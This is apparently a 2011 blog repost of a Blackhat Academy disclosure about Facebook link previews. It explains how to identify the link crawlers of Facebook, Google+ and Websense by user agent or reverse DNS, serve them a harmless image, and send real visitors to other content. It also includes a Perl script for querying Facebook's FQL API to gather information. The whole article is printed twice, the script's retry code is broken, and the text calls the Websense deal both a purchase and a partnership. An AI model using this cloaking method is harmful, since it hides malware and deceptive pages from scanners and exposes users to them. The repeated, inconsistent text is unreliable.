Blackhat Academy claims to have found a way to bypass content restrictions on links, as posted on their site and posts put on a user's public wall. Even Security Analysts claim that Facebook was
notified of these vulnerabilities on July 31st, 2011. To date (October 4, 2011), Facebook has yet to do anything about this.
Facebook has only recently purchased Websense to attempt to push this vulnerability under the rug, however the exploit still works.To access Facebook's FQL API, Facebook was even so kind as to give a reference of tables and columns in the documentation for FQL. FQL does not allow the use of JOINS, however it is not needed as everything is thoroughly documented. Attackers can misuse this during the creation of a malicious Facebook application or directly on the FQL development api page for information gathering.
#!/usr/bin/perl
use warnings;
use XML::Simple;
use LW2;
use Getopt::Std;
my %opts;
getopts('q:',\%opts);
my $query = $opts{q} if defined $opts{q};
$query = "SELECT pic_big FROM user WHERE uid=6666666" unless defined $opts{q};
my $ref = fqlQuery($query);
foreach my $parent (sort keys %{$ref}) {
if (%{$ref->{$parent}}) {
print "$parent: \n";
foreach my $key (sort keys %{$ref->{$parent}}) {
if (%{$ref->{$parent}->{$key}}) {
print "\t$key : \n";
foreach my $mojo (sort keys %{$ref->{$parent}->{$key}}) {
print "\t\t$mojo : ";
print $ref->{$parent}->{$key}->{$mojo};
print "\n";
}
} else { print "\t$key : ";
print $ref->{$parent}->{$key};
print "\n";
}
}
} else {
print "$parent : " . $ref->{$parent} . "\n";
}
}
sub fqlQuery {
my $q = shift;
$q =~ s/ /%20/g;
my $link = "http://api.facebook.com/method/fql.query?query=$q";
my $text = download($link,"api.facebook.com");
my $ref = XMLin($text);
return($ref);
}
sub download
{
my $uri = shift;
my $try = 5;
my $host = shift;
my %request;
my %response;
LW2::http_init_request(\%request);
$request{'whisker'}->{'method'} = "GET";
$request{'whisker'}->{'host'} = $host;
$request{'whisker'}->{'uri'} = $uri;
$request{'whisker'}->{'encode_anti_ids'} = 9;
$request{'whisker'}->{'user-agent'} = "";
LW2::http_fixup_request(\%request);
if(LW2::http_do_request(\%request, \%response)) {
if($try < 5) { print "Failed to fetch $uri on try $try. Retrying...\n"; return undef if(!download($uri, $try++)); } print "Failed to fetch $uri.\n"; return undef; } else { return ($response{'whisker'}->{'data'}, $response{'whisker'}->{'data'});
}
}
While most major sites that allow link submission are vulnerable to this method, sites including Websense, Google+, and Facebook make the requests easily identifiable. These sites send an initial request to the link in order to store a mirror thumbnail of the image, or a snapshot of the website being linked. In doing so, many use a custom user agent, or have IP addresses that resolve to a consistent domain name. Facebook IP addresses resolve to tfbnw.net, also set a custom user agent of "facebookexternalhit".Google+ (also notified Jul. 31st and guilty of reasonable care) again follows suit and utilizes "Feedfetcher-Google" as their user agent. Knowing this, we can easily filter out requests coming from these websites, and offer up a legitimate image to be displayed on their site, while redirecting or displaying a completely different page to anyone that follows the links. Facebook's recent partnership with Websense is laughable, due to Websense's "ACE" security scanner that is just as easily identified, by using gethostbyaddr in order to resolve the IP back to websense.com. Utilizing this technique would allow an overwhelming number of malware sites to remain undetected to their automatic site analysis. Other places like digg.com either spoof a user agent to look like normal traffic, or forward the client's user agent, which makes it more difficult to catch every one of their requests. Fortunately, digg.com only requests the link once, prior to submitting the link to the world. This allows attackers to serve up a legitimate image until that initial request clears our server, and then replace it with a less than honest file. We have affectionately named this vulnerability class Cross-Site Content Forgery.Proof of Concept can be seen here.
Submitted By : Blackhat Academy
notified of these vulnerabilities on July 31st, 2011. To date (October 4, 2011), Facebook has yet to do anything about this.
Facebook has only recently purchased Websense to attempt to push this vulnerability under the rug, however the exploit still works.To access Facebook's FQL API, Facebook was even so kind as to give a reference of tables and columns in the documentation for FQL. FQL does not allow the use of JOINS, however it is not needed as everything is thoroughly documented. Attackers can misuse this during the creation of a malicious Facebook application or directly on the FQL development api page for information gathering.
#!/usr/bin/perl
use warnings;
use XML::Simple;
use LW2;
use Getopt::Std;
my %opts;
getopts('q:',\%opts);
my $query = $opts{q} if defined $opts{q};
$query = "SELECT pic_big FROM user WHERE uid=6666666" unless defined $opts{q};
my $ref = fqlQuery($query);
foreach my $parent (sort keys %{$ref}) {
if (%{$ref->{$parent}}) {
print "$parent: \n";
foreach my $key (sort keys %{$ref->{$parent}}) {
if (%{$ref->{$parent}->{$key}}) {
print "\t$key : \n";
foreach my $mojo (sort keys %{$ref->{$parent}->{$key}}) {
print "\t\t$mojo : ";
print $ref->{$parent}->{$key}->{$mojo};
print "\n";
}
} else { print "\t$key : ";
print $ref->{$parent}->{$key};
print "\n";
}
}
} else {
print "$parent : " . $ref->{$parent} . "\n";
}
}
sub fqlQuery {
my $q = shift;
$q =~ s/ /%20/g;
my $link = "http://api.facebook.com/method/fql.query?query=$q";
my $text = download($link,"api.facebook.com");
my $ref = XMLin($text);
return($ref);
}
sub download
{
my $uri = shift;
my $try = 5;
my $host = shift;
my %request;
my %response;
LW2::http_init_request(\%request);
$request{'whisker'}->{'method'} = "GET";
$request{'whisker'}->{'host'} = $host;
$request{'whisker'}->{'uri'} = $uri;
$request{'whisker'}->{'encode_anti_ids'} = 9;
$request{'whisker'}->{'user-agent'} = "";
LW2::http_fixup_request(\%request);
if(LW2::http_do_request(\%request, \%response)) {
if($try < 5) { print "Failed to fetch $uri on try $try. Retrying...\n"; return undef if(!download($uri, $try++)); } print "Failed to fetch $uri.\n"; return undef; } else { return ($response{'whisker'}->{'data'}, $response{'whisker'}->{'data'});
}
}
While most major sites that allow link submission are vulnerable to this method, sites including Websense, Google+, and Facebook make the requests easily identifiable. These sites send an initial request to the link in order to store a mirror thumbnail of the image, or a snapshot of the website being linked. In doing so, many use a custom user agent, or have IP addresses that resolve to a consistent domain name. Facebook IP addresses resolve to tfbnw.net, also set a custom user agent of "facebookexternalhit".Google+ (also notified Jul. 31st and guilty of reasonable care) again follows suit and utilizes "Feedfetcher-Google" as their user agent. Knowing this, we can easily filter out requests coming from these websites, and offer up a legitimate image to be displayed on their site, while redirecting or displaying a completely different page to anyone that follows the links. Facebook's recent partnership with Websense is laughable, due to Websense's "ACE" security scanner that is just as easily identified, by using gethostbyaddr in order to resolve the IP back to websense.com. Utilizing this technique would allow an overwhelming number of malware sites to remain undetected to their automatic site analysis. Other places like digg.com either spoof a user agent to look like normal traffic, or forward the client's user agent, which makes it more difficult to catch every one of their requests. Fortunately, digg.com only requests the link once, prior to submitting the link to the world. This allows attackers to serve up a legitimate image until that initial request clears our server, and then replace it with a less than honest file. We have affectionately named this vulnerability class Cross-Site Content Forgery.Proof of Concept can be seen here.
Submitted By : Blackhat Academy
No comments:
Post a Comment